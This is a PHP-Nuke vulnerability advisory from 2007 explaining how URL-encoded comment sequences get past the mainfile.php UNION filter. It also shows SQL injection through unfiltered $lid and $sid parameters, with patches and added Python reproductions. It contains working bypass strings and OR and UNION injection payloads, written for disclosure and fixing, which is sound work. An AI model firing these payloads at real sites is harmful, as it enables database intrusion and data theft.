phpnuke-bypass-sql.txt

phpnuke-bypass-sql.txt
Posted Apr 17, 2007
Authored by Aleksandar aka sale83

PHP-Nuke versions 8.0.0.3.3b and below suffer from a flaw that allows the SQL injection protection to be bypassed thus allowing for attacks. Details provided.

tags | exploit, php, sql injection, bypass
SHA-256 | e8ff03b9574af29c44c7061332f9fa9f8c0b900accd47af22c307553c80e497d

PHP Nuke <= 8.0.0.3.3b SQL Injections and Bypass SQL Injection Protection vulnerabilities

________________________
PROGRAM: PHP-Nuke
HOMEPAGE: http://phpnuke.org/
VERSION: All versions up to and including 8.0.0.3.3b
BUG: PHP Nuke <= 8.0.0.3.3b Bypass SQL Injection Protection and SQL Injections vulnerabilities
AUTHOR: Aleksandar
________________________

Let's look at the source code of mainfile.php, starting at line 435:
__________________________________________

//Union Tap
//Copyright Zhen-Xjell 2004 http://nukecops.com
//Beta 3 Code to prevent UNION SQL Injections
unset($matches);
unset($loc);
// Check 1: regex on the rawurldecode()d query string. It fires on five
// characters from the set followed by a space, which is what " UNION " decodes to.
if (isset($_SERVER['QUERY_STRING'])) {
    if (preg_match("/([OdWo5NIbpuU4V2iJT0n]{5}) /", rawurldecode($loc = $_SERVER['QUERY_STRING']), $matches)) {
        die('Illegal Operation 1');
    }
}
// Checks 2 and 3 apply to non-admins only and run on the RAW query string:
// nothing is URL-decoded before the stristr() calls below.
if (!isset($admin) OR (isset($admin) AND !is_admin($admin))) {
    $queryString = $_SERVER['QUERY_STRING'];
    if (($_SERVER['PHP_SELF'] != "/index.php") OR !isset($url)) {
        if (stristr($queryString, 'http://')) die('Illegal Operation 2');
    }
    if ((stristr($queryString, '%20union%20'))
        OR (stristr($queryString, '/*'))
        OR (stristr($queryString, '*/union/*'))
        OR (stristr($queryString, 'c2nyaxb0'))
        OR (stristr($queryString, '+union+'))
        OR ((stristr($queryString, 'cmd=')) AND (!stristr($queryString, '&cmd')))
        OR ((stristr($queryString, 'exec')) AND (!stristr($queryString, 'execu')))
        OR (stristr($queryString, 'concat'))) {
        die('Illegal Operation 3');
    }
}
__________________________________________

So we can see several different filters. :)

Let's start with some testing:

TEST 1
http://localhost/nuke/?/*

We get this message: Illegal Operation 3 (the raw query string contains '/*').

TEST 2
http://localhost/nuke/?%2f*

Yeah - we got through :) The stristr() checks look at the raw query string, which is never URL-decoded, so '%2f*' does not contain '/*'.

TEST 3
http://localhost/?%20UNION%20SELECT

Illegal Operation 1 (check 1 does decode the query string, so it sees ' UNION SELECT' and the regex matches 'UNION ').

TEST 4
http://localhost:8080/html80/?%2f**/UNION%2f**/SELECT ..

Yeah - we got through :) Decoded, this is '/**/UNION/**/SELECT': no space follows UNION, so the regex in check 1 does not match, and the raw string contains neither '/*' nor '*/union/*' because the slashes that would form them are still encoded as %2f. MySQL treats the /**/ comment as whitespace, so the UNION still works once the value reaches a query.




PATCH:
__________________________________________

if ((stristr($queryString, '%20union%20'))
    OR (stristr($queryString, '*%2f*'))
    OR (stristr($queryString, '/*'))
    OR (stristr($queryString, '*/union/*'))
    OR (stristr($queryString, 'c2nyaxb0'))
    OR (stristr($queryString, '+union+'))
    OR ((stristr($queryString, 'cmd=')) AND (!stristr($queryString, '&cmd')))
    OR ((stristr($queryString, 'exec')) AND (!stristr($queryString, 'execu')))
    OR (stristr($queryString, 'concat'))) {
    die('Illegal Operation');
}
__________________________________________

Note: this patch is still a blacklist applied to the raw, undecoded query string. The added '*%2f*' string only matches when a '*' immediately precedes an encoded slash, which the Test 4 payload above does not contain, so on its own it does not close that case. Running the same checks on rawurldecode($queryString) as well would catch both Test 2 and Test 4, but the dependable fix is in the modules: cast $lid and $sid with intval() before they reach a query.
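To make the four tests above reproducible without a PHP-Nuke install, here is a Python port of the mainfile.php filter. This is an added example and not code from the advisory or from PHP-Nuke; it assumes that Python's urllib.parse.unquote() behaves like PHP's rawurldecode() for these inputs (both leave '+' alone), and it adds two things of its own: a `patched` switch that includes the '*%2f*' string from the patch above, and a `decode_first` switch that runs the stristr() checks on the decoded string as well. The fifth payload (UNION separated by tabs rather than spaces) is my own assumption, included to show that a decoded blacklist still has holes: the regex requires a trailing space and MySQL accepts a tab as whitespace.

```python
import re
from urllib.parse import unquote

# Constructed payloads: the four query strings from the advisory plus one
# extra (tab-separated UNION) that is an assumption of this example.
TESTS = {
    "test1": "/*",
    "test2": "%2f*",
    "test3": "%20UNION%20SELECT",
    "test4": "%2f**/UNION%2f**/SELECT",
    "tab_union": "%09UNION%09SELECT",  # assumed payload, not from the advisory
}

# preg_match("/([OdWo5NIbpuU4V2iJT0n]{5}) /"): five characters from the set
# followed by a literal space. "UNION " and "union " both match.
UNION_RE = re.compile(r"[OdWo5NIbpuU4V2iJT0n]{5} ")


def stristr(haystack, needle):
    """PHP stristr() used as a boolean: case-insensitive substring test."""
    return needle.lower() in haystack.lower()


def blacklist_hit(q, patched=False):
    """The 'Illegal Operation 3' checks, applied to whatever string is given."""
    needles = ["%20union%20", "/*", "*/union/*", "c2nyaxb0", "+union+", "concat"]
    if patched:
        needles.append("*%2f*")  # the one string the advisory's patch adds
    if any(stristr(q, n) for n in needles):
        return True
    if stristr(q, "cmd=") and not stristr(q, "&cmd"):
        return True
    if stristr(q, "exec") and not stristr(q, "execu"):
        return True
    return False


def union_tap(query_string, php_self="/modules.php", url_set=False,
              is_admin=False, patched=False, decode_first=False):
    """Port of the mainfile.php filter.

    Returns None when the request is allowed, otherwise the die() message.
    With decode_first=False this is the original behaviour: check 1 sees the
    rawurldecode()d string, checks 2 and 3 see the raw one.
    decode_first=True is an added variant (not from the advisory) that also
    runs the stristr() checks on the decoded string.
    """
    if UNION_RE.search(unquote(query_string)):
        return "Illegal Operation 1"
    if is_admin:
        return None  # checks 2 and 3 are skipped for admins
    if php_self != "/index.php" or not url_set:
        if stristr(query_string, "http://"):
            return "Illegal Operation 2"
    if blacklist_hit(query_string, patched):
        return "Illegal Operation 3"
    if decode_first and blacklist_hit(unquote(query_string), patched):
        return "Illegal Operation 3"
    return None


def run_all(**kwargs):
    """Run every constructed payload through the filter: {name: verdict}."""
    return {name: union_tap(q, **kwargs) for name, q in TESTS.items()}


if __name__ == "__main__":
    for label, opts in [("original", {}), ("patched", {"patched": True}),
                        ("decode_first", {"decode_first": True})]:
        print(f"== {label} ==")
        for name, verdict in run_all(**opts).items():
            print(f"  {name:10s} -> {verdict or 'passed'}")
```

Running it reproduces the advisory: Test 1 and Test 3 are stopped, Test 2 and Test 4 pass, and Test 4 still passes with the patch applied. The decode_first variant blocks Test 2 and Test 4 but lets the tab-separated payload through, which is the argument for fixing the modules rather than the blacklist.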



Multiple SQL Injection vulnerabilities in the Web_Links, News and Downloads modules



+++++++++++++++++++++++++++

php.ini
magic_quotes_gpc = Off
register_globals = On
+++++++++++++++++++++++++++


Now let's look at the source code of Web_Links/index.php:

Vulnerable function:

function viewlinkcomments($lid) {
    global $prefix, $db, $admin, $bgcolor2, $module_name, $admin_file;
    include("header.php");
    include("modules/$module_name/l_config.php");
    menu(1);
    $row = $db->sql_fetchrow($db->sql_query("SELECT title FROM ".$prefix."_links_links WHERE lid='$lid'")); // BUG ---> $lid used unfiltered
    $ttitle = filter($row['title'], "nohtml");
    $lid = intval(trim($lid)); // WTF? <===== the cast happens only AFTER the query has already run :)
    echo "<br>";
    ...


How to fix:

Move $lid = intval(trim($lid)); above the $row = $db->sql_fetchrow($db->sql_query("SELECT title FROM ".$prefix."_links_links WHERE lid='$lid'")); line, so the cast happens before the value is used in a query.

___________________________________________
function viewlinkcomments($lid) {
    global $prefix, $db, $admin, $bgcolor2, $module_name, $admin_file;
    include("header.php");
    include("modules/$module_name/l_config.php");
    menu(1);
    $lid = intval(trim($lid)); // FIX: cast before the query
    $row = $db->sql_fetchrow($db->sql_query("SELECT title FROM ".$prefix."_links_links WHERE lid='$lid'"));
    $ttitle = filter($row['title'], "nohtml");
    //$lid = intval(trim($lid)); // REMOVE THIS LINE !!!!!!!
    echo "<br>";
    ...
__________________________________________________

Vulnerable functions:

function viewlinkcomments($lid) {
function viewlinkeditorial($lid) {
function ratelink($lid, $user) {

The "$lid" variable isn't filtered, so if we bypass the SQL injection protection we can execute arbitrary SQL commands.
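What the unfiltered $lid does to the query, and why moving the intval() cast fixes it, can be shown without a PHP-Nuke install. The following is an added example, not code from the advisory or from PHP-Nuke: it rebuilds the viewlinkcomments() query against an in-memory SQLite table with constructed rows (standing in for MySQL and the nuke_links_links table), approximates PHP's intval(trim()) with a small helper, and adds a third variant using a bound parameter that the advisory does not mention. The two payloads are constructed; the UNION one uses /**/ in place of spaces, which is how Test 4 above would carry it past the mainfile.php filter. The example itself bypasses nothing, it only shows what the query does once a value has reached it.

```python
import re
import sqlite3


def php_intval(value):
    """Approximates PHP intval(trim($x)) on a string: leading integer, else 0."""
    m = re.match(r"[+-]?\d+", str(value).strip())
    return int(m.group()) if m else 0


def make_db():
    """In-memory stand-in for nuke_links_links with constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE nuke_links_links (lid INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO nuke_links_links VALUES (?, ?)",
                   [(1, "first link"), (2, "second link"), (3, "third link")])
    return db


def vulnerable_titles(db, lid):
    """Mirrors the original viewlinkcomments(): $lid is interpolated as-is
    (magic_quotes off) and the intval() cast only comes afterwards."""
    sql = f"SELECT title FROM nuke_links_links WHERE lid='{lid}'"
    rows = [r[0] for r in db.execute(sql)]
    lid = php_intval(lid)  # too late: the query has already run
    return rows


def fixed_titles(db, lid):
    """The advisory's fix: cast first, then build the query."""
    lid = php_intval(lid)
    sql = f"SELECT title FROM nuke_links_links WHERE lid='{lid}'"
    return [r[0] for r in db.execute(sql)]


def parameterized_titles(db, lid):
    """Added variant (not in the advisory): bound parameter, so the value can
    never change the shape of the statement even if the cast were forgotten."""
    return [r[0] for r in db.execute(
        "SELECT title FROM nuke_links_links WHERE lid=?", (php_intval(lid),))]


# Constructed payloads.
OR_PAYLOAD = "1' OR '1'='1"
UNION_PAYLOAD = ("0'/**/UNION/**/SELECT/**/title/**/FROM/**/nuke_links_links"
                 "/**/WHERE/**/lid=3--")

if __name__ == "__main__":
    db = make_db()
    for lid in ("2", OR_PAYLOAD, UNION_PAYLOAD):
        print(f"lid={lid!r}")
        print("  vulnerable   :", vulnerable_titles(db, lid))
        print("  fixed        :", fixed_titles(db, lid))
        print("  parameterized:", parameterized_titles(db, lid))
```

With the OR payload the vulnerable query returns every row; with the UNION payload it returns the title of a row the caller never asked for. Both fixed variants reduce the payload to the integer 1 (or 0) and return only what that id selects, which is why the cast has to come before the query, not after it.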

SQL Injection vulnerability in Downloads
Vulnerable functions:

function viewdownloadeditorial($lid) {
function viewdownloadcomments($lid) {
function ratedownload($lid, $user) {

The "$lid" variable isn't filtered, so if we bypass the SQL injection protection we can execute arbitrary SQL commands.


SQL Injection vulnerability in News
Vulnerable function:

function rate_complete($sid, $rated=0, $score) {

The "$sid" variable isn't filtered, so if we bypass the SQL injection protection we can execute arbitrary SQL commands.

Best Regards
Aleksandar
Programmer and Web Developer